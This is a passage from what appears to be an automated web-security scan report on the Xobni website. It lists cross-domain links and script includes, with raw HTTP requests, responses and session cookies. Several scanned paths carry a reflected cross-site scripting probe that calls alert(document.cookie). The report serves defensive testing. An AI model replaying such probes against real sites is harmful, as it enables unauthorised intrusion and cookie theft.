   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

11.9. http://www.xobni.com/errors/404.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/errors/404.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/errors/404.php?report_my_error=1&source=&asked=test

The response contains the following link to another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /errors/404.php?report_my_error=1&source=&asked=test HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7913

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

11.10. http://www.xobni.com/learnmore/video previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/learnmore/video

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/learnmore/video?lc=en

The response contains the following link to another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /learnmore/video?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18191

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Video Gal
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

11.11. http://www.xobni.com/mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d?lc=en

The response contains the following link to another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:03:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8012

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

11.12. http://www.xobni.com/partners previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/partners

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/partners?lc=en

The response contains the following link to another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /partners?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10553

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Search Add
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

11.13. http://www.xobni.com/press/testimonials previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/press/testimonials

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/press/testimonials?lc=en

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://widgets.twimg.com/j/2/widget.js

Request

GET /press/testimonials?lc=en HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14533

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Testimonial
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</style>
           <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

11.14. http://www.xobni.com/products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/products

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/products?lc=de

The response contains the following link to another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /products?lc=de HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:02:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9287

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Outlook P
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

11.15. http://www.xobni.com/support/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/support/

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/support/?view=192

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://asset0.zendesk.com/external/zenbox/zenbox-2.0.js
http://code.google.com/apis/gadgets/docs/reference/

Request

GET /support/?view=192 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:36 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 202358

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni: What parts
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</a> of Xobni for Outlook supports the majority of the <a href='http://code.google.com/apis/gadgets/docs/reference/'>Google Gadgets API</a>
...[SNIP]...
</script>-->

<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/zenbox-2.0.js"></script>
...[SNIP]...

11.16. http://www.xobni.com/support/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/support/

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/support/?view=150

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://asset0.zendesk.com/external/zenbox/zenbox-2.0.js
http://support.microsoft.com/kb/870553
http://support.microsoft.com/kb/940226

Request

GET /support/?view=150 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 204589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni: Why is Out
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
<br />
See this <a href='http://support.microsoft.com/kb/940226'>Microsoft article</a>
...[SNIP]...
<br />
See this <a href='http://support.microsoft.com/kb/870553'>Microsoft article</a>
...[SNIP]...
</script>-->

<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/zenbox-2.0.js"></script>
...[SNIP]...

11.17. http://www.xobni.com/support/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/support/

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/support/?view=29

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://asset0.zendesk.com/external/zenbox/zenbox-2.0.js
http://www.microsoft.com/Net/Download.aspx
http://www.microsoft.com/downloads/details.aspx?FamilyID=889482FC-5F56-4A38-B838-DE776FD4138C&displaylang=en

Request

GET /support/?view=29 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 201678

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni: I can't in
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
<br />
When connected to the internet, download the .Net framework (available <a href='http://www.microsoft.com/Net/Download.aspx' target='_blank'>here</a>
...[SNIP]...
</b>This Windows component is required to install Xobni. You can download it from Microsoft <a href='http://www.microsoft.com/downloads/details.aspx?FamilyID=889482FC-5F56-4A38-B838-DE776FD4138C&displaylang=en' target=_'blank'>here</a>
...[SNIP]...
</script>-->

<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/zenbox-2.0.js"></script>
...[SNIP]...

11.18. http://www.xobni.com/support/contact_form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/support/contact_form

Issue detail

The page was loaded from a URL containing a query string:

http://www.xobni.com/support/contact_form?type=billing

The response contains the following link to another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /support/contact_form?type=billing HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:12 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6701
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
<TITLE>Contact</TITLE>
<link rel='stylesheet' href='/csscache/1256842155/style
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12. Cross-domain script include previous next
There are 135 instances of this issue:

http://www.xobni.com/
http://www.xobni.com/about/
http://www.xobni.com/about/contact
http://www.xobni.com/about/jobs
http://www.xobni.com/about/jobs.php
http://www.xobni.com/about/opensource
http://www.xobni.com/about/opensource.php
http://www.xobni.com/account/
http://www.xobni.com/admin/
http://www.xobni.com/advanced-search
http://www.xobni.com/autosuggest-outlook
http://www.xobni.com/blackberry
http://www.xobni.com/csscache/
http://www.xobni.com/csscache/1256842155/
http://www.xobni.com/csscache/1256842155/styles/
http://www.xobni.com/csscache/1265760498/
http://www.xobni.com/csscache/1265760498/styles/
http://www.xobni.com/csscache/1291147037/
http://www.xobni.com/csscache/1291147037/styles/
http://www.xobni.com/developer/
http://www.xobni.com/developer/gadget_hoovers
http://www.xobni.com/download
http://www.xobni.com/download/
http://www.xobni.com/download/12341
http://www.xobni.com/download/latest
http://www.xobni.com/email-analytics
http://www.xobni.com/enterprise
http://www.xobni.com/enterprise/
http://www.xobni.com/enterprise/case_studies
http://www.xobni.com/enterprise/contact
http://www.xobni.com/enterprise/mobile_professionals
http://www.xobni.com/enterprise/sales_professionals
http://www.xobni.com/enterprise/salesforce_extension
http://www.xobni.com/enterprise/sharepoint_extension
http://www.xobni.com/enterprise/sign_up
http://www.xobni.com/enterprise/solutions_providers
http://www.xobni.com/errors/401.php
http://www.xobni.com/errors/403.php
http://www.xobni.com/errors/404.php
http://www.xobni.com/errors/500.php
http://www.xobni.com/errors/general.php
http://www.xobni.com/facebook-outlook
http://www.xobni.com/fan
http://www.xobni.com/find-attachments
http://www.xobni.com/fr-fr/
http://www.xobni.com/fr-fr/account.
http://www.xobni.com/fr-fr/account/
http://www.xobni.com/fr-fr/legal/privacy.
http://www.xobni.com/fr-fr/legal/tos.
http://www.xobni.com/get-salesforce
http://www.xobni.com/homepage/
http://www.xobni.com/homepage/homeproducts/
http://www.xobni.com/homepage/homeproducts/subsfree_test
http://www.xobni.com/homepage/homeproducts/subsplus_popup_test
http://www.xobni.com/homepage/homeproducts/subsplus_test
http://www.xobni.com/homepage/homeproducts/xobnifree
http://www.xobni.com/homepage/homeproducts/xobnimobile
http://www.xobni.com/homepage/homeproducts/xobniplus
http://www.xobni.com/homepage/productmenu/
http://www.xobni.com/homepage/productmenu/free
http://www.xobni.com/homepage/productmenu/mobilebb
http://www.xobni.com/homepage/productmenu/plus
http://www.xobni.com/homepage/productmenu/xobnione
http://www.xobni.com/hoovers-outlook
http://www.xobni.com/huddle-outlook
http://www.xobni.com/learnmore/
http://www.xobni.com/learnmore/compare.php
http://www.xobni.com/learnmore/extension_step1.php
http://www.xobni.com/learnmore/mobile
http://www.xobni.com/learnmore/mobile/
http://www.xobni.com/learnmore/mobile/blackberry/
http://www.xobni.com/learnmore/mobile/blackberry/get_started
http://www.xobni.com/learnmore/mobile/blackberry/get_started.php
http://www.xobni.com/learnmore/mobile/blackberry/magic_address_book
http://www.xobni.com/learnmore/mobile/blackberry/setup_instructions
http://www.xobni.com/learnmore/mobile/blackberry/setup_instructions.php
http://www.xobni.com/learnmore/mobile/buynow
http://www.xobni.com/learnmore/mobile/trial
http://www.xobni.com/learnmore/one/
http://www.xobni.com/learnmore/plus/
http://www.xobni.com/learnmore/plus/advanced_search.php
http://www.xobni.com/learnmore/video
http://www.xobni.com/legal/ip_policy
http://www.xobni.com/legal/license
http://www.xobni.com/legal/privacy
http://www.xobni.com/legal/tos
http://www.xobni.com/legal/trademarks
http://www.xobni.com/linkedin-outlook
http://www.xobni.com/lp/
http://www.xobni.com/lp/x1/
http://www.xobni.com/media/contextual_gadgets/hoovers/xobniHoovers.xml
http://www.xobni.com/mobile
http://www.xobni.com/mobile/
http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/
http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
http://www.xobni.com/mobile81ff6scriptalert(document.cookie)/
http://www.xobni.com/mobile81ff6scriptalert(document.cookie)/scriptffa1c61d19d
http://www.xobni.com/one
http://www.xobni.com/opensource/NsisDotNet/README.htm
http://www.xobni.com/outlook-calendar
http://www.xobni.com/outlook-social-connector
http://www.xobni.com/partners
http://www.xobni.com/partners/
http://www.xobni.com/partners/partners_content
http://www.xobni.com/partners/partners_content.php
http://www.xobni.com/partners/partners_signup.php
http://www.xobni.com/plus
http://www.xobni.com/press/
http://www.xobni.com/press/05202010_german_release.php
http://www.xobni.com/press/09022010_harris_survey
http://www.xobni.com/press/10282010_french_release.php
http://www.xobni.com/press/coverage
http://www.xobni.com/press/logos
http://www.xobni.com/press/releases
http://www.xobni.com/press/testimonials
http://www.xobni.com/products
http://www.xobni.com/relationship-management
http://www.xobni.com/salesforce
http://www.xobni.com/salesforce-outlook
http://www.xobni.com/search-conversations
http://www.xobni.com/search-outlook
http://www.xobni.com/social-outlook
http://www.xobni.com/support/
http://www.xobni.com/support/contact_form
http://www.xobni.com/support/index.php
http://www.xobni.com/threaded-conversations
http://www.xobni.com/twitter-outlook
http://www.xobni.com/xing-outlook
http://www.xobni.com/xlbh084ghjklyvco872656468
http://www.xobni.com/xlbh084ghjklyvco872656468/
http://www.xobni.com/xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l
http://www.xobni.com/xlbh084ghjklyvco872656468/jhvbil75jhsd2546s7l/
http://www.xobni.com/xobni-plus
https://www.xobni.com/support/
https://www.xobni.com/videos/

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

12.1. http://www.xobni.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://widgets.twimg.com/j/2/widget.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:26 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 21477

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Outlook P
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</h3>

       <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

12.2. http://www.xobni.com/about/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/about/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /about/ HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.9.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 12451

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni, the Outloo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.3. http://www.xobni.com/about/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/about/contact

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /about/contact HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:20 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11770

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Search Yo
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.4. http://www.xobni.com/about/jobs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/about/jobs

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /about/jobs HTTP/1.1
Host: www.xobni.com
Accept: */*
